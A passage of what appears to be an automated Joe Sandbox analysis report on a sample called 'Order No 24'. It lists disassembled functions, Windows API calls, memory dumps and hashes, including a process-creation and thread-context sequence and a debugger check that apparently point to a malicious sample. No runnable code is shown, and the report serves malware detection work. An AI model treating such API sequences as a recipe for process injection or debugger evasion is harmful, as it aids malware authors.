                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                  • String ID: <G
                                                                                                                                  • API String ID: 1820251861-2138716496
                                                                                                                                  • Opcode ID: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                                                                                                                  • Instruction ID: 82a7b5bd6e3cea00c3dcde19f71b789cf3b4dc9c3a0f3bbfba624219139fdf9b
                                                                                                                                  • Opcode Fuzzy Hash: d011c5d47cdb58f56df8e94be1aec8ea7e3142591cfed6364f25de72fcaf6d29
                                                                                                                                  • Instruction Fuzzy Hash: 0C11A770A00306ABDB11BFB49C4276E76F8AF8B350B15C925F419D7291EB34CA1197E1
                                                                                                                                  Function 0099D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0099D28B,SwapMouseButtons,00000004,?), ref: 0099D2BC
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2DD
                                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0099D28B,SwapMouseButtons,00000004,?,?,?,?,0099C865), ref: 0099D2FF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                  • Opcode ID: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                                                                                                                  • Instruction ID: 54fe7f0a92269ec6b2e916f8c84bb62bd19061c085bfb641242e799af7f48351
                                                                                                                                  • Opcode Fuzzy Hash: 139467c8870f08e026b4f3ff36c705f0b121867e52eafa68fa2977c3e9226cae
                                                                                                                                  • Instruction Fuzzy Hash: 32113976612209BFDF208FA8CC85EAF7BBCEF54745F104869E806D7110E631AE429B60
                                                                                                                                  Function 01272BB0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0127336B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01273401
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01273423
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                                                                                  • Instruction ID: eccee1302969c92f824d89a455b8cd6ded0c705dff51b3adbe2e318e842230d5
                                                                                                                                  • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                                                                                  • Instruction Fuzzy Hash: EB621B70A24259DAEB24CFA4C851BDEB371FF58300F1091A9D20DEB394E7759E81CB59
                                                                                                                                  Function 009CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                                                                                                                    • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                                                                                                                    • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                                                                                                                  • _free.LIBCMT ref: 009CC4DD
                                                                                                                                  • _free.LIBCMT ref: 009CC4E4
                                                                                                                                  • _free.LIBCMT ref: 009CC54F
                                                                                                                                    • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                                                                                                                    • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                                                                                                                  • _free.LIBCMT ref: 009CC557
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                  • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                                                                  • Instruction ID: bd44cbeff4031a48c0e3a6762d54e4d1a61b9199559fa50fe3c2d89635e1149b
                                                                                                                                  • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                                                                  • Instruction Fuzzy Hash: 68514EB1E04219AFDB149F64DC81BADBBB9EF48310F1044AEF25DA3251DB715A808F59
                                                                                                                                  Function 0099EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0099EBB2
                                                                                                                                    • Part of subcall function 009851AF: _memset.LIBCMT ref: 0098522F
                                                                                                                                    • Part of subcall function 009851AF: _wcscpy.LIBCMT ref: 00985283
                                                                                                                                    • Part of subcall function 009851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0099EC07
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0099EC16
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009F3C88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                  • Opcode ID: 211f93f6eb73993e9ce32dab5cf50185aa7187615ced1cdb207bd282a7e3fd47
                                                                                                                                  • Instruction ID: 7f5c63486e760215467db79599eeb38bbb3ec6f9f0477dad00ce846e71f802d7
                                                                                                                                  • Opcode Fuzzy Hash: 211f93f6eb73993e9ce32dab5cf50185aa7187615ced1cdb207bd282a7e3fd47
                                                                                                                                  • Instruction Fuzzy Hash: AD21D7759047889FEB32DB68C859BF7BFEC9B41308F04048DE6DE56282D3786A858B51
                                                                                                                                  Function 009840E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009F3725
                                                                                                                                  • GetOpenFileNameW.COMDLG32 ref: 009F376F
                                                                                                                                    • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                                                                                                                    • Part of subcall function 009840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 3777226403-3081909835
                                                                                                                                  • Opcode ID: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                                                                                                                  • Instruction ID: 8320e39998196686aa3b36b395c024da4e2592e46d88db5bbcb4e9f00459de10
                                                                                                                                  • Opcode Fuzzy Hash: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                                                                                                                  • Instruction Fuzzy Hash: 0E21A871A141989FCF01EFD4C845BEE7BF89F99304F008059E505EB341DBB85A898F65
                                                                                                                                  Function 009CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 009CC72F
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009CC746
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                  • String ID: aut
                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                  • Opcode ID: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                                                                                                                  • Instruction ID: 1acf0c4767ea78bc6ff420d7d7862763af22229bfd70b47af1f567cef363188b
                                                                                                                                  • Opcode Fuzzy Hash: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                                                                                                                  • Instruction Fuzzy Hash: 20D05E7250030EBBDB10EBE0DC0EFCA776CA704704F0005A07750A50B1DAB4E69B8B54
                                                                                                                                  Function 009DF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                                                                                                                  • Instruction ID: 00b13ac2e8c232cfa6b9c9afcfdcdc129a0d9cc9d1be226837d3d5837a348adf
                                                                                                                                  • Opcode Fuzzy Hash: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                                                                                                                  • Instruction Fuzzy Hash: 1CF16A716043419FCB10DF28C891B6AB7E5BFC8314F14896EF99A9B392D734E945CB82
                                                                                                                                  Function 00984FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00985022
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell__memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 928536360-0
                                                                                                                                  • Opcode ID: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                                                                                                                  • Instruction ID: d345d2fccc6737b0e2dd772a8c21811a156b9ab505a27fb70a6974333f30d9c4
                                                                                                                                  • Opcode Fuzzy Hash: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                                                                                                                  • Instruction Fuzzy Hash: 9E3161B5504701CFD721EF68D845697BBE8FF89304F00092EE69E87351E772A989CB92
                                                                                                                                  Function 009A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 009A3973
                                                                                                                                    • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81E9
                                                                                                                                    • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81F3
                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 009A397A
                                                                                                                                    • Part of subcall function 009A821F: GetModuleFileNameW.KERNEL32(00000000,00A40312,00000104,00000000,00000001,00000000), ref: 009A82B1
                                                                                                                                    • Part of subcall function 009A821F: ___crtMessageBoxW.LIBCMT ref: 009A835F
                                                                                                                                    • Part of subcall function 009A1145: ___crtCorExitProcess.LIBCMT ref: 009A114B
                                                                                                                                    • Part of subcall function 009A1145: ExitProcess.KERNEL32 ref: 009A1154
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                  • Opcode ID: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                                                                                                                  • Instruction ID: f1066e868426c7ff09647d279b4cc672865869225fafa7ce99020550e8a9086d
                                                                                                                                  • Opcode Fuzzy Hash: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                                                                                                                  • Instruction Fuzzy Hash: D301B536345301DAE6217BB8EC46B6B739C9FC3764F218125F6059B392DFB49D0186E0
                                                                                                                                  Function 009CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009CC385,?,?,?,?,?,00000004), ref: 009CC6F2
                                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009CC708
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC70F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                  • Opcode ID: ee79da8c8f03acd2656866713318312ab0c6389a7660661386b5dbad3e59b7ba
                                                                                                                                  • Instruction ID: d62a209aa522a4a0c7f214362866109eda39126882d4db084d33174eb410fa54
                                                                                                                                  • Opcode Fuzzy Hash: ee79da8c8f03acd2656866713318312ab0c6389a7660661386b5dbad3e59b7ba
                                                                                                                                  • Instruction Fuzzy Hash: C5E08633140218B7D7215BD4AC09FCA7F18EB05760F104210FB14690E097B125538799
                                                                                                                                  Function 009CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 009CBB72
                                                                                                                                    • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                                                                                                                    • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                                                                                                                  • _free.LIBCMT ref: 009CBB83
                                                                                                                                  • _free.LIBCMT ref: 009CBB95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                                                  • Instruction ID: 508681b008552f981ea6066e29bc8f5808ab3a123371406cb72a543aafc28401
                                                                                                                                  • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                                                  • Instruction Fuzzy Hash: 90E012A1A4174147DA2465796E45FB337EC4F46361F14081DB499E7146CF24EC4085F4
                                                                                                                                  Function 00982322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009824F1), ref: 00982303
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009825A1
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00982618
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009F503A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3815369404-0
                                                                                                                                  • Opcode ID: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
                                                                                                                                  • Instruction ID: 5d04e6a69485e34dbd895cf33232b78c4ce3da3158cf672c0f82b978149c7058
                                                                                                                                  • Opcode Fuzzy Hash: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
                                                                                                                                  • Instruction Fuzzy Hash: 0371BBBC9413858B8344EFEAE990594BBA4FBDA344790423ED119CB3B1DBB25482CF55
                                                                                                                                  Function 009E0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _strcat.LIBCMT ref: 009E08FD
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • _wcscpy.LIBCMT ref: 009E098C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1012013722-0
                                                                                                                                  • Opcode ID: e953bec8fc449d042f1073b0362a69ae811efaeec666b61699dae80e69165737
                                                                                                                                  • Instruction ID: 7f39c15b75412541f97cae9b1005ac7d838885e13635bbb70f84a1ad9dd726ec
                                                                                                                                  • Opcode Fuzzy Hash: e953bec8fc449d042f1073b0362a69ae811efaeec666b61699dae80e69165737
                                                                                                                                  • Instruction Fuzzy Hash: AC913934A00605DFCB19EF29C495A6DB7E5FF89310B54846AF85A8F3A2DB74ED41CB80
                                                                                                                                  Function 00983A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsThemeActive.UXTHEME ref: 00983A73
                                                                                                                                    • Part of subcall function 009A1405: __lock.LIBCMT ref: 009A140B
                                                                                                                                    • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00983AF3
                                                                                                                                    • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983B08
                                                                                                                                    • Part of subcall function 00983D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                                                                                                                    • Part of subcall function 00983D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
